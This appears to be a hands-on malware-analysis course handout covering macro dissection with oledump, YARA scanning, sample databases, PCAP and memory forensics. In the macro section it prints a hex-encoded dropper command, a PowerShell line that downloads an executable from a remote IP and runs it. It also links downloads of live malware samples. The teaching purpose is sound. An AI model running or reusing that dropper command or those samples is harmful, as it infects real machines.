
Advanced Malware V3


############################
# Download the Analysis VM #
############################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts




- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.

- After logging in, please open a terminal window and type the following commands:

cd Desktop/


- This is actual malware (remember to run it in a VM; the password to extract it is 'infected'):


cd /home/infosecaddicts/Desktop/
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate

unzip malware-password-is-infected.zip
    infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe

***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html
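The `file` steps above work on content, not the file name, which is why renaming malware.exe to malware.pdf changes nothing. The following added example (not part of the course material) does the same magic-byte identification for a few of the signatures from Kessler's list and follows the DOS header's e_lfanew field to the PE signature; the sample bytes are a constructed, non-executable stand-in for malware.exe.

```python
import struct

# Magic-byte signatures (constructed subset of Gary Kessler's file_sigs.html).
# `file` identifies content the same way, so the name/extension is irrelevant.
SIGNATURES = [
    (b"MZ", "PE/DOS executable"),
    (b"%PDF", "PDF document"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (e.g. Word .doc)"),
    (b"PK\x03\x04", "ZIP archive (also .docx/.xlsx/.jar)"),
]

def identify(data: bytes) -> str:
    """Return a type name from the leading bytes, ignoring the file name."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"

def pe_header_offset(data: bytes):
    """For an MZ file, read e_lfanew (offset 0x3c) and confirm the 'PE\\0\\0'
    signature there. Returns the PE header offset, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return e_lfanew

def make_fake_pe() -> bytes:
    """Constructed stand-in for malware.exe: a DOS header whose e_lfanew
    points at a PE signature, padded with zeros. It is not runnable code."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)   # e_lfanew -> PE header at 0x80
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20

if __name__ == "__main__":
    sample = make_fake_pe()
    for name in ("malware.exe", "malware.pdf"):   # the rename from the lab
        print(f"{name}: {identify(sample)}, PE header at {pe_header_offset(sample)}")
```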


objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

                            - We didn't see anything like HKLM, HKCU or other registry-type strings

strings malware.exe | grep -i irc

strings malware.exe | grep -i join           

strings malware.exe | grep -i admin

strings malware.exe | grep -i list


                            - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

sudo apt-get install -y python-pefile
     malware

vi analyse_malware.py

python analyse_malware.py malware.exe




Building a Malware Scanner
--------------------------

mkdir /Desktop/malwarescanner

cd /Desktop/malwarescanner

wget https://github.com/jonahbaron/malwarescanner/archive/master.zip

unzip master.zip

cd malwarescanner-master/

python scanner.py -h

cat strings.txt

cat hashes.txt

mkdir /Desktop/malcode

cp /Desktop/malware.exe /Desktop/malcode

python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt

cd /Desktop/



#####################################################
# Analyzing Macro Embedded Malware                  #
# Reference:                                        #
# https://jon.glass/analyzes-dridex-malware-p1/     #
#####################################################
cp /Desktop/

- Create a FREE account on:
https://malwr.com/account/signup/

- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/

file /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin

cat /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin




sudo pip install olefile
     malware

mkdir /Desktop/oledump

cd /Desktop/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

cp /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .

mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc


-----------------------------------------------------------------------------------------------------------------------------------



sudo pip install olefile
     malware

mkdir /Desktop/oledump

cd /Desktop/oledump

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip

unzip 064016.zip
     infected

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

- From this we can see that this Word document contains an embedded file called editdata.mso which contains 7 data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.


python oledump.py 064016.doc -s A5 -v

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.


python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B

- Take that long blob that starts with 636D and ends with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
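Instead of pasting the blob into a web form, the decoding can be done offline. The added example below (not part of the course material) generalizes the "find GVhkjbjv" step: it pulls every quoted hex literal out of macro source (including a value built up with `&` concatenation), decodes it and lists any URLs it contains. The VBA text is a constructed sample whose hidden command is a harmless placeholder, not the lab's payload.

```python
import re

# Constructed stand-in for `oledump.py 064016.doc -s A3 -v` output: a macro
# that hides its command line as a hex string split across two assignments.
VBA_SAMPLE = r'''
Sub AutoOpen()
    Dim GVhkjbjv As String
    GVhkjbjv = "636D64202F4B206563686F20657861"
    GVhkjbjv = GVhkjbjv & "6D706C6520687474703A2F2F6578616D706C652E696E76616C69642F746F6F6C2E62696E"
    Shell(Decode(GVhkjbjv))
End Sub
'''

HEX_RUN = re.compile(r'"([0-9A-Fa-f]{16,})"')   # quoted runs of 8+ hex bytes
URL = re.compile(r'https?://[^\s\'"<>]+')

def decode_hex_literals(vba: str):
    """Join every quoted hex run in the module in order of appearance (how a
    concatenated variable is rebuilt), decode it and return (text, urls)."""
    blob = "".join(HEX_RUN.findall(vba))
    if len(blob) % 2:            # odd length: trailing nibble is not a byte
        blob = blob[:-1]
    decoded = bytes.fromhex(blob).decode("latin-1", errors="replace")
    return decoded, URL.findall(decoded)

if __name__ == "__main__":
    text, urls = decode_hex_literals(VBA_SAMPLE)
    print("decoded:", text)
    print("urls   :", urls)
```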




##############
# Yara Ninja #
##############
sudo apt-get remove -y yara
     malware

wget https://github.com/plusvic/yara/archive/v3.4.0.zip

sudo apt-get -y install libtool
     malware

unzip v3.4.0.zip

cd yara-3.4.0

./bootstrap.sh

./configure

make

sudo make install
    malware

yara -v

cd ..

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd /Desktop

yara rules-master/packer.yar malcode/malware.exe


Places to find more Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara



Yara rule sorting script:
-------------------------
https://github.com/mkayoh/yarasorter



cd /Desktop/rules-master
for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\"; done > master.yar
cd /Desktop/
yara rules-master/master.yar malcode/malware.exe










Here is a 2.1 million sample malware DB created by Derek Morton that you can use to start your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2


Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/




###############################
# Creating a Malware Database #
###############################

Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
    malware

wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip

unzip malware-password-is-infected.zip
    infected

python avsubmit.py --init

python avsubmit.py -f malware.exe -e





Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing the MySQL database
- Run the following command in the terminal:

sudo apt-get install mysql-server
     malware
   
- Step 2: Installing the Python MySQLdb module
- Run the following commands in the terminal:

sudo apt-get build-dep python-mysqldb
     malware

sudo apt-get install python-mysqldb
     malware

- Step 3: Logging in
- Run the following command in the terminal:

mysql -u root -p                    (set a password of 'malware')

- Then create a database by running the following command:

create database malware;

exit;

wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py                        (fill in the database connection information)

python mal_to_db.py -i

------- check to see if the files table was created ------

mysql -u root -p
    malware

show databases;

use malware;

show tables;

describe files;

exit;

---------------------------------


- Now add the malicious file to the DB

python mal_to_db.py -f malware.exe -u



- Now check to see if it is in the DB

mysql -u root -p
    malware

mysql> use malware;

select id,md5,sha1,sha256,time FROM files;

mysql> quit;
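The sqlite and MySQL sections above both end with a `files` table of id, md5, sha1, sha256 and time per sample, which is also what the scanner's `-H hashes.txt` check consumes. The added example below (not the course's avsubmit.py or mal_to_db.py) builds that table in an in-memory sqlite database, records a sample's three hashes and answers a hash lookup; the sample bytes are a constructed stand-in for malware.exe.

```python
import hashlib
import sqlite3
import time

# Constructed stand-in for malware.exe; hashing works on any bytes.
SAMPLE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 100

def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """Open the DB and create a `files` table with the columns the lab
    queries. sha256 is UNIQUE so re-adding a sample is a no-op, not a dup."""
    conn = sqlite3.connect(path)
    conn.execute("""CREATE TABLE IF NOT EXISTS files (
        id     INTEGER PRIMARY KEY AUTOINCREMENT,
        md5    TEXT NOT NULL,
        sha1   TEXT NOT NULL,
        sha256 TEXT NOT NULL UNIQUE,
        time   TEXT NOT NULL)""")
    return conn

def hashes(data: bytes) -> dict:
    """md5/sha1/sha256 of the file contents, hex encoded."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256")}

def add_sample(conn, data: bytes) -> bool:
    """Insert the sample's hashes; returns True only if it was new."""
    h = hashes(data)
    cur = conn.execute(
        "INSERT OR IGNORE INTO files (md5, sha1, sha256, time) VALUES (?, ?, ?, ?)",
        (h["md5"], h["sha1"], h["sha256"], time.strftime("%Y-%m-%d %H:%M:%S")))
    conn.commit()
    return cur.rowcount == 1

def lookup(conn, data: bytes):
    """Hash-based scan: return the matching row for a file, or None."""
    return conn.execute(
        "SELECT id, md5, sha1, sha256, time FROM files WHERE sha256 = ?",
        (hashes(data)["sha256"],)).fetchone()

if __name__ == "__main__":
    conn = open_db()
    print("added:", add_sample(conn, SAMPLE))   # True
    print("again:", add_sample(conn, SAMPLE))   # False, already known
    print("hit  :", lookup(conn, SAMPLE))
    print("miss :", lookup(conn, b"benign file"))
```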





#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics

ls | grep pcap

perl chaosreader.pl suspicious-time.pcap

firefox index.html

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr

sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
     malware  


for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u





#############################
# PCAP Analysis with tshark #
#############################
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u


tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u


tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'


tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq


tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq

tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"


whois rapidshare.com.eyu32.ru

whois sploitme.com.cn


tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -R http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'



######################################
# PCAP Analysis with forensicPCAP.py #
######################################
cd /Desktop
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py

sudo easy_install cmd2
     malware

python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap

ForPCAP >>> help


Prints stats about the PCAP
ForPCAP >>> stat


Prints all DNS requests from the PCAP file. The id before the DNS entry is the packet's id, which can be used with the "show" command.
ForPCAP >>> dns

ForPCAP >>> show


Prints all destination ports from the PCAP file. The id before each entry is the packet's id, which can be used with the "show" command.
ForPCAP >>> dstports

ForPCAP >>> show


Prints the number of source IPs and stores them.
ForPCAP >>> ipsrc

ForPCAP >>> show


Prints the number of web requests and stores them.
ForPCAP >>> web

ForPCAP >>> show

Prints the number of mail requests and stores them.
ForPCAP >>> mail

ForPCAP >>> show


###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility

python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
                ***Takes a few min***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf



cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js

cat malicious.js


*****Sorry - no time to cover JavaScript de-obfuscation today*****


cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem                                   
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon   
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done

